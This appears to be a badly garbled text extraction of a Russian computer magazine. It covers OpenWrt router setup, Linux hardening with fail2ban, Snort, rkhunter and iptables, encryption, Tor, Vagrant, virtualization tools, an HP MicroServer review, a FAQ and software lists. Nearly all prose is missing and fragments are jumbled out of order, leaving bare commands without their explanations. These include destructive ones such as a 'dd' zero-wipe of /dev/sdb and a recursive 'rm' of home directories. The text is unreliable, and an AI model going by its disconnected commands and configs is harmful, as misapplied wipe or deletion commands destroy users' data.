( IP, PPP, PPPoE, L2TP
), broadcast dhcp,
MAC- .
ClientID dhcp (option 61) MAC-.
.
( ) -, . OpenWrt . LuCI -
-:

openwrt# opkg update


openwrt# opkg install luci

/etc/config/fstab extroot


openwrt# /etc/init.d/uhttpd enable


openwrt# /etc/init.d/uhttpd start

option
option
option
option

root.

openwrt# passwd
, Telnet, SSH. -
.
-, .
,
.

EXTROOT
Extroot , , ,
, .
extroot . ,
, .
. OpenWrt, . , , .
:

openwrt# opkg update
openwrt# opkg install block-mount kmod-usb-storage kmod-scsi-generic kmod-fs-ext4 e2fsprogs
mount .
( ext3 Linux,
OpenWrt) :

openwrt# mkdir /mnt/flash_overlay
openwrt# mount /dev/sda1 /mnt/flash_overlay
openwrt# tar -C /overlay -cvf - . | tar -C /mnt/flash_overlay -xf -

WWW
OpenWrt:
wiki.openwrt.org/doc/start

fstype ext3
options rw,sync
enabled 1
enabled_fsck 0

.
,
mount
,
etc/config/fstab option
enabled 0.

SAMBA
, .
. ,
Samba.

openwrt# opkg update
openwrt# opkg install samba36-client samba36-server luci-app-samba
openwrt# rm /tmp/luci-indexcache

Samba, - .
, , . -,
Edit template security = user
( ) security = share, - , - nobody , , :

openwrt# /etc/init.d/samba enable


openwrt# /etc/init.d/samba start
-.
transmission - , -. :

openwrt# opkg update
openwrt# opkg install transmission-daemon transmission-web

/etc/
config/fstab,
extroot:


/etc/config/transmission:

<...>
config mount
option target /overlay
option device /dev/sda1

config transmission
<...>
#
option enabled '1'

#
option config_dir '/etc/transmission'
# , .
# Samba
# nobody,
option user 'nobody'
#
option download_dir '/home/storage/torrents/done'
#
option incomplete_dir '/home/storage/torrents/incompl'
<...>
.

openwrt# /etc/init.d/transmission enable


openwrt# /etc/init.d/transmission start


,
- (, , ) -, ,
. , .
SquashFS . ,
-.
JFFS2, SquashFS, /. , . .
OpenWrt mtd- . SquashFS /rom, JFFS2
/overlay. overlayfs
SquashFS JFFS3, /, .

-,
9091, - .

DLNA -
, . , DLNA- . , , , Blu-ray-,
. OpenWrt minidlna DLNA-,
:

openwrt# opkg update


openwrt# opkg install minidlna
UCI /etc/config/minidlna. :

# -
config minidlna config
<...>
option enabled '1'
#
option interface 'br-lan'
# minidlna
option db_dir '/home/storage/minidlna/db'
option log_dir '/home/storage/minidlna/log'
#
list media_dir 'A,/home/storage/audio'
list media_dir 'V,/home/storage/video'
list media_dir 'P,/home/storage/photo'
<...>

DD-WRT
DD-WRT - OpenWrt .
.
, , ,
.
Status Sys-Info, , .
, .
:
Samba ProFTPD;
OpenVPN PPTP;
nstx IP over DNS, , - ,
;
HotSpot- , ;
SIP-.
optware ( ), . , JFFS2,
, .
DD-WRT ,
, , . -,
90 . ,

, .

, minidlna ,
.

openwrt# /etc/init.d/minidlna enable


openwrt# /etc/init.d/minidlna start
.
, .
, minidlna inotify, . , , :

openwrt# minidlna -R -f /tmp/minidlna.conf

OPENWRT
- OpenWrt, , OpenWrt Buildroot.
:

$ sudo apt-get install subversion build-essential git-core libncurses5-dev zlib1g-dev gawk

- DD-WRT


OpenWrt
(feeds). .

$ mkdir openwrt && cd $_
$ svn co svn://svn.openwrt.org/openwrt/trunk/
$ cd trunk
$ ./scripts/feeds update -a && ./scripts/feeds install -a

, .

$ make prereq
, .

$ make menuconfig
, , ,
. menuconfig
, , M
ipk,
. , , , -
, .

:
. , .
.
, .
. LuCI.
.
Global build settings / IPv6. Advanced
configuration options , , , , GCC,

.
. ,
. USB Support
kmod-usb-storage.
.
-
,

$ make kernel_menuconfig
, ,
.

$ svn revert -R target/linux/


factory-, sysupgrade-.
:

$ scp bin/ar71xx/openwrt-ar71xx-generic-tl-wdr4300-v1-squashfs-factory.bin root@192.168.1.1:/tmp
openwrt# mtd -r write /tmp/openwrt-ar71xx-generic-tl-wdr4300-v1-squashfs-factory.bin firmware
(write)
, firmware, (-r). OpenWrt
,
- .



.
.

.
OpenWrt. -
( ) -
, Telnet .
,
, Telnet
.
-
.
,
. ,
, , , .
OpenWrt. ipk . ,
( DNS-), .
DD-WRT Wi-Fi , ,
SSH .

$ make
. ,
bin/ .
, . -,
.
scp mtd
. OpenWrt,

. scp mtd

-, .

,
- .

. , DD-WRT, Tomato, ,
NAS, VPN, -
(OpenWrt/LibreWRT) ,
.
, ,
,
. .


John Doe

Linux-
,
.
?
?
. , Linux 30 .

.
-,
.
-.
, ,
SSH-. ,
,
.
, ,

. SSH- (!) (!!),
,
-, ,
,

.
Gmail, ,
, .
, , , ,
. , ,
, . , -
,
, ,
. ,
Google , - .
, Linux . ,
. , ,

,
.

!
. : Linux-, -, FTP- SSH-
.
812 .

,
:

$ openssl rand -base64 6


, -, OpenSSL
. , - ,
pwgen (,
):

$ pwgen -Bs 8 1
?
, .
? , , Google
Mozilla . , .
. - -


KeePassX

Ecryptfs

KeePassX. ,
-, ,
- Android (KeePassDroid).
.

, . ,
/etc/fstab.
~/.Private ~/Private,

.
PAM- pam_ecryptfs.
so, . ~/Private ,
~/.Private .

.
, ,
~/Dropbox. :

... .
HTTPS-
, . :
, : . : Dropbox
, : .
.
.
Linux ,
.
dmcrypt/LUKS, ecryptfs encfs. ,
, , ,
Dropbox.
, TrueCrypt .
,
, ,
. ,

. , ,

( , ).
, ecryptfs:

, 2,5
, vasya,
. vasya :

$ mount | grep Private


/home/vasya/.Private on /home/vasya
type ecryptfs ...
,
:

$ sudo rm -r /home/vasya.*

$ sudo ecryptfs-setup-swap
$ ecryptfs-setup-private
, , .

$ sudo apt-get install secure-delete


$ srm -.txt home-video.mpg

, :

, . ,
, dd:

# dd if=/dev/zero of=/dev/sdb
sdb.
( ) . fdisk mkfs.vfat,
gparted.


,
.
iptables pf, -

# ecryptfs-migrate-home -u vasya

K, ,
, ? , - .
,
,
. ,
? srm, ,
:

$ sudo apt-get install ecryptfs-utils


BRUTEFORCE-

Fail2ban (www.fail2ban.org) ,
.
, IP-
iptables
TCP Wrappers.
email
. Fail2ban
SSH,
Apache, lighttpd, Postfix, exim, Cyrus
IMAP, named .
Fail2ban
.
Ubuntu/Debian :

# apt-get install fail2ban


/etc/
fail2ban. fail2ban
:

# /etc/init.d/fail2ban restart


OpenBSD, ,
ipkungfu. ? , ,
. :

$ sudo apt-get install ipkungfu


:

$ sudo vi /etc/ipkungfu/ipkungfu.conf
# ,
# ,
# loopback-
LOCAL_NET="127.0.0.1"
#
GATEWAY=0
#
FORBIDDEN_PORTS="135 137 139"
# , 90%
#
BLOCK_PINGS=1
#
# ( )
SUSPECT="DROP"
#
# ( DoS)
KNOWN_BAD="DROP"
# ? !
PORT_SCAN="DROP"
ipkungfu /etc/
default/ipkungfu IPKFSTART = 0
IPKFSTART = 1. :

$ sudo ipkungfu
/etc/sysctl.conf:

$ sudo vi /etc/sysctl.conf
# ICMP- (
# MITM)
net.ipv4.conf.all.accept_redirects=0
net.ipv6.conf.all.accept_redirects=0
# TCP syncookies
net.ipv4.tcp_syncookies=1
# ( ,
#
# TCP- )
net.ipv4.tcp_timestamps=0
net.ipv4.conf.all.rp_filter=1
net.ipv4.tcp_max_syn_backlog=1280
kernel.core_uses_pid=1

Rkhunter


$ sudo sysctl -p

GRUB :
1. /sbin/grub
, md5crypt
.

MD5-.
2. /boot/grub/grub.
conf password --md5 .


Snort . ,
.
? , Snort :

$ sudo apt-get install snort


$ snort -D
! , Snort
, , , .

. :

[**] [1:2329:6] MS-SQL probe response overflow attempt [**]
[Classification: Attempted User Privilege Gain] [Priority: 1]
[Xref => http://www.securityfocus.com/bid/9407]

$ sudo vi /etc/cron.daily/rkhunter.sh
#!/bin/bash
/usr/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Results" vasya@email.com
email-
:

$ sudo chmod +x /etc/cron.daily/rkhunter.sh

. - MySQL. . .

rkhunter :

$ sudo rkhunter --update

- , Snort, root
, . ,
, , . rkhunter:

$ sudo apt-get install rkhunter

, ,
cron-.
:

$ sudo apt-get install tiger
$ sudo tiger
$ sudo apt-get install lynis
$ sudo lynis -c

$ sudo rkhunter -c --sk


.
- , rkhunter .
: /var/log/
rkhunter.log. rkhunter
cron- :

, , . ,
,
rkhunter. debsums
, . :

$ sudo apt-get install debsums


:



,
. :

$ netstat -na | grep ":\ " | wc -l


TCP-:

$ sudo debsums -ac

Tor ,
HTTP-

$ netstat -na | grep ":\ " | grep SYN_RCVD | wc -l

,
cron.

IP-, :

$ netstat -na | grep ":\ " | sort | uniq -c | sort -nr | less

,

, -
. - . ,
.

,
Chrome Firefox,
proxy switcher. , ,
.
,

DNS- ,
DNS-,
: goo.gl/FLJmVj.
/etc/resolv.conf:

nameserver 156.154.70.22
nameserver 156.154.71.22

DHCP-
NetworkManager , ,

:

tcpdump:

INFO

# tcpdump -n -i eth0 -s 0 -w output.txt dst port


and host IP-
:

Tor Android
Orbot.



,

.
ecryptfs

Ubuntu.

# iptables -A INPUT -s IP- -p tcp


--destination-port -j DROP

IP :

# iptables -I INPUT -p tcp --syn --dport -m


iplimit --iplimit-above 10 -j DROP
ICMP ECHO:

# iptables -A INPUT -p icmp -j DROP --icmp-type 8

$ sudo dnscrypt-proxy --daemonize


, dnscrypt Windows, iOS
Android.

.
Tor-: ()

.
Tor :


$ sudo chattr +i /etc/resolv.conf

, root.
,
dnscrypt,
DNS- ,
. :

$ wget http://download.dnscrypt.org/dnscrypt-proxy/dnscrypt-proxy-1.3.2.tar.bz2
$ bunzip2 -cd dnscrypt-proxy-*.tar.bz2 | tar xvf -
$ cd dnscrypt-proxy-*
$ sudo apt-get install build-essential
$ ./configure && make -j2
$ sudo make install
/etc/resolv.conf loopback:

$ vi /etc/resolv.conf
nameserver 127.0.0.1

? Tor.
Tor, , ,
.
,

,
. , , ,
,
,
.
, ,
. Tor : (
),
( ),

$ sudo apt-get install tor


,
-, Tor. :
127.0.0.1:9050, ,
. , SOCKS,
HTTP-.

. Linux-box,
, ,
,
.
, SSH,

.

Tor
()

SYN/ACK



, , .
, . , ,
, .

Vagrant . (boxes),
, boxes .
boxes Chef Puppet. ,
shell.
Ruby. VM SSH,
.
Vagrant Ruby,
,
VirtualBox Ruby. (downloads.vagrantup.com) Windows, Linux (deb rpm) OS X.
Ubuntu . VirtualBox Vagrant :

$ sudo dpkg -i virtualbox-4.2.10_amd64.deb


$ sudo dpkg -i vagrant_1.2.2_x86_64.deb

VAGRANT
VirtualBox ,
. VM , ,
, , .
Vagrant (vagrantup.com),
VM (Provisioning) .
Vagrant VirtualBox, . AWS (github.com/mitchellh/vagrant-aws) Rackspace Cloud (github.com/mitchellh/vagrant-rackspace), VMware Fusion/Workstation.

VirtualBox 4.2.14 Vagrant, 4.2.12 4.2.15. , :

$ cd ~/.vagrant.d/boxes/BoxName/virtualbox
$ openssl sha1 *.vmdk *.ovf > box.mf
Vagrant Ruby:

$ sudo apt-get install ruby1.8 ruby1.8-dev rubygems1.8
$ sudo gem install vagrant


grinder@synack.ru


Vagrantfile (docs.vagrantup.com/v2/vagrantfile). ,
:


$ mkdir project
$ cd project
$ vagrant init
: VM (config.vm.*), SSH
(config.ssh.*), Vagrant (config.vagrant).
,
.

, :
Vagrant ( ),
boxes ( '--vagrantfile'), ~/.vagrant.d . ,
, .
vagrant,
'-h'.
, vagrant
box list . box
, , . , Box Ubuntu 12.04 LTS,
Vagrant.

$ vagrant box add precise64 http://files.vagrantup.com/precise64.box
Vagrantfile:

config.vm.box = "precise64"
:

$ vagrant init precise64


, Chef
Puppet, VM ,
Vagrantfile , , ,
:

Vagrant.configure("2") do |config|
  config.vm.provision :shell, :inline => "script.sh"
end
, script.sh,
VM.
ovf-,

VirtualBox VBoxManage:


$ VBoxManage import /home/user/.vagrant.d/boxes/precise64/virtualbox/box.ovf
Virtual system 0:
0: Suggested OS type: "Ubuntu_64"
(change with "--vsys 0 --ostype <type>"; use
"list ostypes" to list all possible values)
1: Suggested VM name "precise64"
(change with "--vsys 0 --vmname <name>")
2: Number of CPUs: 2
(change with "--vsys 0 --cpus <n>")
3: Guest memory: 384 MB
(change with "--vsys 0 --memory <MB>")
, , , VM (. change with ...):

config.vm.provider :virtualbox do |vb|
  vb.customize ["modifyvm", :id, "--memory", "1024"]
end

WWW
Vagrant:
vagrantup.com
Vagrant Up and
Running: bit.ly/177wzfR
Karesansui:
karesansui-project.info
ConVirt:
convirture.com
WebVirtMgr:
webvirtmgr.net

SSH:

$ vagrant up
$ vagrant ssh

Proxmox VE:
proxmox.com

VM, halt
destroy ( ,
),
vagrant suspend, vagrant resume.
Chef
, APT Apache2:

config.vm.provision :chef_solo do |chef|
  chef.recipe_url = "http://files.vagrantup.com/getting_started/cookbooks.tar.gz"
  chef.add_recipe("vagrant_main")
end
VM ,
. 22
2222, SSH.
Vagrantfile:

Vagrant::Config.run do |config|
  config.vm.forward_port 80, 1111
end


Vagrant

- ,
http://127.0.0.1:1111/.
, .

Vagrant VirtualBox


WebVirtMgr

ConVirt

INFO
Vagrant
Karesansui
MIT.

Vagrant
VeeWee (github.com/jedi4ever/veewee).

$ vagrant package --vagrantfile Vagrantfile --output project.box
project.box
,
,
vagrant box add project.box.


Availability, VLAN, , , .
TurboGears2,
ExtJs FLOT, MySQL,
DHCP- DNS- dnsmasq. Linux.

CONVIRT
Xen/KVM, , ,
. . ConVirt (convirture.com) Xen KVM
, .
: , , , , VM VNC, . Ajax
. , VM
. , .
, .
,
convirt-tool . .
ConVirt
,

,
. .
.
,
, . , .
: ,
, ,
, , Xen
KVM. , VM
.

.
ConVirt Convirture, open core ( ),
,
. open source High

KARESANSUI
Karesansui (karesansui-project.info)
-
KVM Xen. , libvirt, OpenVZ, QEMU, VirtualBox
. , Web 2.0 Ajax, jQuery
,
-. , - . TightVNC Java
Viewer (tightvnc.com).
: , , , , VM, ,
, . .
.
,
.
Karesansui Python,
SQLite. Karesansui, , MySQL
PostgreSQL.
Karesansui Linux. CentOS (
), Karesansui
Debian Ubuntu.
, . . ,
.

. , : Guest, Settings, Job,
Network, Storage, Report Log. .
VM ISO- HTTP/FTP- . : ,
, (hostname),


(Xen KVM),
(Memory Size Disk Size) ,
, .


VM

VirtualBox:

WEBVIRTMGR
,

. .
WebVirtMgr (webvirtmgr.net) virt-manager,
VM
Java-. KVM: , , ,
VM, .
, ISO, ,
. VNC. .
WebVirtMgr
KVM. RPC
libvirt (TCP/16509) SSH.
Python/Django. Linux.
(github.com/euforia/webvirtmgr) RPM CentOS, RHEL, Fedora Oracle Linux 6.

( ), libvirt WebVirtMgr. .
Dashboard Add Connection , VM.

PROXMOX VE
,
. , , . Proxmox Virtual Environment (proxmox.com/proxmox-ve), Linux
( Debian 7.0 Wheezy),
OpenVZ KVM ,
VMware vSphere, MS Hyper-V Citrix XenServer.
, (
), . - VM.
OpenVZ,
( , /var/lib/vz/template).
.
,

#!/bin/bash
vmname="debian01"
VBoxManage createvm --name ${vmname} --ostype "Debian" --register
VBoxManage modifyvm ${vmname} --memory 512 --acpi on --boot1 dvd
VBoxManage createhd --filename "${vmname}.vdi" --size 10000 --variant Fixed
VBoxManage storagectl ${vmname} --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach ${vmname} --storagectl "IDE Controller" \
  --port 0 --device 0 --type hdd --medium "${vmname}.vdi"
VBoxManage storageattach ${vmname} --storagectl "IDE Controller" \
  --port 0 --device 1 --type dvddrive --medium /iso/debian-7.1.0-i386-netinst.iso
VBoxManage modifyvm ${vmname} --nic1 bridged --bridgeadapter1 eth0 --cableconnected1 on
VBoxManage modifyvm ${vmname} --vrde on
screen VBoxHeadless --startvm ${vmname}

. ,
.
, ,
VM .
(VM, , )
, (AD, LDAP, Linux PAM, Proxmox VE).
- VM
VNC- SSH-, , , .
, , HA-,
,
iSCSI-,
, multipath .
: CPU x64 (
Intel VT/AMD-V), 1+ . ISO Debian.

VM
WebVirtMgr

- . .

Proxmox VE



zobnin@gmail.com

HP PROLIANT N54L G7
MICROSERVER:


, , NAS.
. HP MicroServer
.


. , , CD-,
:
.
USB-, RJ-45
Ethernet, VGA-, eSATA, ,
PCIe , .
,
,
, , HP
. , MicroServer ,
, (. ).
Kensington, , , ,
.
,


MicroServer N54L G7, AMD Turion II Neo N54L 2 , Ethernet-.


, Active Directory - .

-, HP Ultra Micro Tower.
, 250 6 ,
,
, - . , , - .
CD, USB- , . ,

, ,

WWW

HDD- SSD
:
goo.gl/Rsb91y


:
goo.gl/zKoIFB

GEN8
HP MicroServer Gen8. ,
, , G7,
, , MicroServer
,

, SATA 3.0
HP iLO 4.
G1610T Gen8 Intel Celeron G1610T (2,3 ),
Intel C204, RAID-
HP Dynamic Smart Array B120I
. G2020T
Intel Pentium G2020T (2,5 )
.
16 , c 12 .
PCIe
PCIe x16, eSATA ,
USB 3.0.
, HP iLO 4,
ProLiant.
Gen8 2022 , G7.

HP MICROSERVER
ixbt.com: HP ProLiant MicroServer:
(bit.ly/16wMabQ)
overclockers.com.au: HP ProLiant MicroServer Owners Club! (bit.ly/ijIXUU)
avforums.com: HP ProLiant MicroServer N40L
Owners Thread (bit.ly/14vP8jb)

Windows Home Server 2011


Ubuntu 12.10
Solaris 11.1
FreeNAS 8.3.1
ESXi 5.1.0 Update 1 (HP Custom Image)


, CD-. , , ,
3,5-
, 250 ;
,
RAID.
, , , SATA- CD-
, SATA-
- . ,
SSD-, 5,25-
, SATA-,
Molex SATA, BIOS (www.multiupload.com/BTBRCJUNTO)
.
,
. , , ,
. ,
- ,
,
. CD-
, , .
, ,
, , , , ,
, . ,
USB- A,
ready-to-go
FreeNAS.


HP MicroServer .
-, FTP-, NAS, -


WARNING

DDR3 ECC
.
ACPI S3
(sleep), ,
,
HP,

.
PCI Express x16


25 .

, .
MicroServer Active Directory , , , .
, RAID-
. , RAID- (



: AMD Turion II Neo N54L (2,20 , 15 , 2 M)
: AMD RS785E/SB820M
: 2 DDR3
: DDR3 PC3-10600E-9 (non-ECC Unbuffered ECC) 1 Samsung PC3-10600E-9 Unbuffered ECC 2
, 8 ( 16 )
Serial ATA: 5 SATA + 1 eSATA ( mini-SAS 1 SFF-8087 1 SATA)
: 3,5" SATA-
: 8 (4 2 ) ( 3 )
: , 1 250
RAID: SATA- RAID 0, 1, 10, JBOD
: HP NC107i ( Broadcom BCM5723KMLG)
Jumbo frames:
: 150
: 1 PCIe x16 v2.0, 1 PCIe x4 ( IPMI), 1 PCIe x1
-: 1 VGA-, 7 USB 2.0 (4 , 2 , 1 ), 1 RJ-45
: Radeon HD4200, : 1920 1200
: Ultra Micro Tower, 26,7 21,0 26,0
: 1
: ACPI V2.0, PCI 2.3, PXE, WOL, IPMI 2.0, USB 2.0, USB 3.0, SATA Gen 2
: Microsoft Windows Server, Red Hat Enterprise Linux (RHEL)


HP MicroServer
.
.

Intel EXPI9301CTBLK Network Adapter 10/100/1000
/ PCI-Express
HP NC360T Dual Port 10/100/1000 / PCI-Express
RAID-
HP P410 Smart Array Controller
HighPoint RocketRAID 2720SGL

Kingston KVR1333D3E9S/4G
HP 500672-B21 4

Western Digital 2 T WD Red (WD20EFRX) {SATA III,
5400 / 64 , 3,5"}
SSD ( , L2ARC ZIL/SLOG
ZFS)
Intel SSD 60 520 (SSDSC2CW060A3K5)
{SATA III, MLC, 2,5"}

HP 615095-B21 Micro Server Remote Access Card Kit
USB 3.0
PCI Express to SuperSpeed USB 3.0 2-Port Expansion
Card for Desktops ( Renesas uPD720202 xHCI
1.0)
HDMI- (
N54L )
ATI Radeon HD 5450 512 DDR3 Sapphire (11166-0610R, PCI-E, DVI, HDMI, VGA)

Seasonic SS-250SU

ZFS

Fake RAID) (, RAID 5 ) , , ,



RAID.
Linux Btrfs,
NAS RAID 5 (
3-way mirror ),
, .
MicroServer
,
,
.
.

, . , VGA,
, -, .
HDMI-
. ,
, PCIe x16, 25 ( : n40l.wikia.com/wiki/Graphics_Cards.


Scythe Slip Stream 120 PWM Adjustable

INFO

:
E/F,
G,
.

MicroServer ESXi Xen.


,
.
- .

MicroServer.

HP MicroServer N54L G7
. 8500
. ,

, ,
, ,
PCIe-, MicroServer , ,
.


FAQ


gotsijroman@gmail.com


FAQ@REAL.XAKEP.RU


Ubuntu. Network Manager, Android, . ?
, Network Manager
ad hoc (bit.ly/adhoc-wiki),
Android ( iOS,
, ). hotspot.
XDA (bit.ly/hotspotubuntu) ,
, Network Manager.
, hotspot , ap-hotspot. :

$ sudo add-apt-repository ppa:nilarimogard/webupd8
$ sudo apt-get update
$ sudo apt-get install ap-hotspot

Mhash/s //
Bitcoin- wiki (bit.ly/bitcoinhard). ,

.
. ?
, , SQL-, , XSRF , ][ .
:
SSL , : HTTP HTTPS. SSL
,
.

Q
A

Qualys SSL server test (www.ssllabs.com/ssltest) SSL ( )
. HSTS (HTTP Strict Transport Security)
,
HTTPS. : dev.chromium.org/sts.
XSS,
, Content security policy
(bit.ly/CSPIntro) ,
.
XSS-
.
WAF, , ModSecurity.


SSL Qualys

$ sudo ap-hotspot start


start, stop,
restart configure. ,
hotspot,
.
, ,
bitcoin?

bitcoin-,
bitclockers.com/calc.

Q
A

DUPLICITY OS X LINUX

.

. , ,
NSA, , duplicity

. ? , ,
GnuPG, ,
, , ,

.


OS X
Homebrew MacPorts. MacPorts
, duplicity


Duplicity GnuPG . , ,
,
GnuPG-:

$ sudo port install duplicity

$ gpg --gen-key

Ubuntu apt-get.
Google Drive,
gdata-python-client.
(bit.ly/GData-dwn),

$ ./setup.py install

$ gpg --export-secret-key -a > mykey.key


.
,
.


/ .
, . (bit.ly/forgPassImpl)
(bit.ly/remMeImpl).


TRIM
SSD WINDOWS?


, ?
- (ctrlq.org/save),
. , , URL
,
. , , API filepicker.io (www.inkfilepicker.com).

Q
A

fsutil:

fsutil behavior query DisableDeleteNotify

0, , TRIM .
, TRIM , TRIM SSD. , , , 100% ,
TRIM ( , ),
TRIMCheck (bit.ly/TrimCheck). : ,
, .
. , (
, JSON- ). , , TRIM. ,
, TRIM: SSD
. ; , .
, , , TRIM SSD
. , - SSD. SATA MS.
, SSD.

Nexus 7 3G. SMS, ,


, . SMS-. ?
(,
XDA: bit.ly/N73GnativeSMS)
mms.apk /system/app
( root),
rw-r--r--. Root Browser (bit.ly/RootBrowser) , . SMS- .


SSH- . , , . ,
, .
?
, SSH- ,
: , Wi-Fi- . SSH
.
Mosh (mosh.mit.edu).
Mosh
SSH Telnet. SSP (State Synchronization Protocol),


Google Drive.
, ,
.
, :

$ export PASSPHRASE="passphrasehere"
$ duplicity /home/user/ "gdocs://username:xxxx xxxx xxxx xxxx@gmail.com/backup"
passphrasehere
GnuPG-,
Google. Backup GDrive.

TRIMCheck

Duplicity ,

( librsync).
(--full-if-older-than), (--remove-older-than). ,
cron bash-:

$ export PASSPHRASE="passphrasehere"
$ duplicity --full-if-older-than 1M /home/user/ "gdocs:..."
$ duplicity remove-older-than 6M --force "..."
unset PASSPHRASE
exit 0


,
,

.

duplicity "gdocs://username:xxxx xxxx xxxx xxxx@gmail.com/backup" /home/user
Google Drive, duplicity

. man
(duplicity.nongnu.org).



/DEBUG
Windows

. : bcdedit -debug on, .


.
?
, , .
.
<F10>
Windows. , , /DEBUG ( )
<Enter>.
,
, , ,
:

bcdedit -debug off



.
Mosh ,
UDP. Mosh , WiFi
3G-, ,
. Linux, OS X,
Android. .
VBS ?
, ?
VBS ,
, .
. , AutoItX3 AutoIt,
ActiveX/COM-.
script-coding.com/AutiItX.html, DLL
300 : bit.ly/AutoItX3.
,
. DLL- system32

Q
A

regsvr32 AutoItX3.dll
, , :


DNS-.

DNS-, , , ,
- DNS Google . ?
DNS-

Google
(

OpenDNS) The
Global Internet Speedup (afasterinternet.com).
. ,
, , ,
. , ,
. , ,
Namebench ( Windows, Linux OS X).
DNS,
DNS-
.

64- Windows 7

,
. , -

Set oAutoIt = WScript.CreateObject("AutoItX3.Control")
'
oAutoIt.MouseMove 0,0 '
oAutoIt.MouseMove 150, 150, 0

VS

, , ?

,
.

,

, , CVV/CVC2-
Visa.

SVN-.

Git?
.
, .
, git-svn. Git SVN.
Git
,
SVN-, . , git-svn ,
Git.
: bit.ly/git-svn-tut.
Windows, git-svn
msysGit (msysgit.github.io).
, git-svn Cygwin.

Q
A

cron , 5 ?
cron ,
cron, .
shell-,
sleep:

Q
A

while true
do
/home/xakep/myprogram
sleep 5
done

, , nohup:

$ nohup ./every5seconds.sh &


. ?
. in-memory
, , . ,
, .
LMDB (symas.com/mdb) FastDB (garret.ru/fastdb.html). Redis
(redis.io) . Redis
, .

Q
A



. ,
.

,

.

>Multimedia
Artweaver 4.0
Bytescout Watermarking
BZR Player 0.95
Caesium 1.6.1
Colour Surprise 1.0
Epic Pen
Format Factory 3.1.1
FotoMix 9.2
FotoMorph 13.8
MoviePile

>Misc
8Stack
Backup Thunderbird
Bgcall 2.6.2
Bill2?s Process Manager 3.4.3.6
BlueScreenView 1.52
Classic Shell 3.6.8
Folder Actions for Windows 1.1
Marble 1.5.0
MouseController 1.6
NCS WinVisible 1.0.6.6
Nucleus 0.2.0
Quick Any2Ico 1.1
RegDllView 1.50
SchizoCopy
ServiWin 1.56
XSearch 0.23

>Development
Alaborn iStyle 5.4.4.1
AntiSQLi
Bandit 1.1.1
Boost 1.54.0
Boost Dependency Analyzer 1.1
CodeLite 5.2
DBeaver 2.2.4
GitHub 1.0
MySQL 5.6.13
MySQL Workbench 6.0.6
PHP 5.5.1
PyScripter 2.5.3
RadASM 2.2.1.6
SmartGitHg 4.6.2
SourceTree 1.0.8
Visual Assist X
Ynote Classic 2.5

>>WINDOWS
>DailySoft
7-Zip 9.20
DAEMON Tools Lite 4.47.1
Far Manager 3.0
Firefox 23
foobar2000 1.2.9
Google Chrome 28
K-Lite Mega Codec Pack 9.9.6
Miranda IM 0.10.16
Notepad++ 6.4.5
Opera 15.0
PuTTY 0.62
Skype 6.3
Sysinternals Suite
Total Commander 8.01
Unlocker 1.9.2
uTorrent 3.3.1
XnView 2.04

>>MAC
Abyss Web Server 2.9
Blender 2.68
BootChamp 1.5.1
Dapplegrey 3.6
Eclipse IDE 4.3
GitHub 1.50

>System
AllOff 5.2
DriverIdentifier 4.2.5
dUninstaller 1.3
Install Monitor 1.1
ISOBuddy 1.1.1.3
Partition Wizard 8
PrivaZer 2.0.1
Process Hacker 2.31
Quick Cliq 2.0.8
SaBackup 0.9.6.1
TCCLE 13.0
USB Oblivion 1.10
Windows Surface Scanner 2.20
WinLogOnView 1.01
WirelessKeyView 1.67

>Security
BBQSQL
Copernicus
CrowdDetox 1.0 Beta
CrowdInspect
DLLInjector 0.2
ESET NOD32 Antivirus 6
idaConsonance
Nishang 0.3.0
Phoneme
Protectorion ToGo
Topera 0.0.2
VirtualDeobfuscator
VMInjector 0.1
Watcher 1.5.8
Xenotix XSS Exploit Framework 4
XSS ChEF 0.1

>Net
Acrylic DNS Proxy 0.9.22
CrossLoop 2.82
EagleGet 1.1.0.3
Filedrop 1.1
I2P 0.9.7.1
Lanshark 0.0.2
Mailbird 1.0.6.0
NetworkLatencyView 1.0
OpenVPN 2.3.2
RetroShare 0.5.4e
SRWare Iron Browser 28.0.1550.0
Syndie 1.103b
Tor Browser Bundle 2.3.25
VPNium 1.7
Xirrus Wi-Fi Inspector 1.2.1.4
ZamZom 1.0.0

MusicBrainz Picard 1.2


Nomacs 1.4.0
NPS Image Editor 3.0.81
OpenMusicPlayer 0.3
QGifer 0.2.1
Songr 1.9.43
TAudioConverter 0.9.0

>Net
4kdownload 2.6
Anomos 0.9.5
Babel 1.4.2
Eiskaltdcpp 2.2.8
Etherape 0.9.13

>Games
Boswars 2.7
Stuntrally 2.1
Wesnoth 1.11.5

>Devel
Amber 0.11.0
Bazaar 2.6.0
Checkstyle 5.6
Codimension 2.0.2
Django-qrauth 0.1.1
Eclipse 4.3
Editra 0.7.20
Geotools 9.3
Jug 0.9.6
Mlton 20130715
Mono 3.2.1
Ocaml-top 1.1.0
Pyqt 5.0
Pysmb 1.1.5
Qtcreator 2.8.0
Sonarqube 3.5.1
Wxhexeditor 0.22
Zk 6.5.2

>>UNIX
>Desktop
Audacious 3.4
Avidemux 2.6.4
Ballroomdj 1.9
Blender 2.68a
Calligra 2.7.1
Cdemu 2.1.0
Digikam 3.3.0
Easytag 2.1.8
Ffmpeg 2.0.1
Libreoffice 4.1.0
Mp3splt 2.6
Openavitogif 0.5.7
Patool 1.3
Pinta 1.4
Qcad 3.2.0
Qmmp 0.7.1
Rosegarden 13.06
Workrave 1.10.1

Hotkey EVE 1.4.3


iBoostUp 3.7
ImageOptim 1.4.3
MySQL Workbench 6.0.6
ohmiGeneLite 5.37.3
PHP 5.5.1
TextMate 2.0 alpha
The Unarchiver 3.8
TimeTracker 0.4.4
Tomcat 7.0.41
Tor Browser Bundle 2.3.25
Transmission 2.82
Vecte 0.0.2
XAMPP 1.8.3
YouView 0.5

>X-distr
Fedora 19

>System
Conserve 0.3.0.0
Directoryexplorer 1.0
Extcarve 1.4
Linux 3.10.6
Mupen64 2.0
Nvidia 325.15
Pf-kernel 3.10.1
Reiser4 3.10
Sakura 3.1.0
Virtualbox 4.2.16
Wayland 1.2.0
Wine 1.6.0
Xen 4.3.0
Zbackup 1.1

>Server
Apache 2.4.6
Asterisk 11.5.0
Cassandra 1.2.8
CouchDB 1.3.1
CUPS 1.6.3
HAproxy 1.4.24
Lighttpd 1.4.32
Lucene 4.4
Memcached 1.4.15
MongoDB 2.4.5
nginx 1.4.2
OpenSSH 6.2
OpenVPN 2.3.2
Redis 2.6.14
Samba 4.0.8
Sphinx 2.0.8
Squid 3.3.8

>Security
Gufw 13.10
John 1.8.0
Junkie 2.5.0
Keybox 1.08.50
Pyhids 0.4
Samhain 3.0.13
Tomb 1.4
Torsocks 1.2
Xtables-addons 2.3
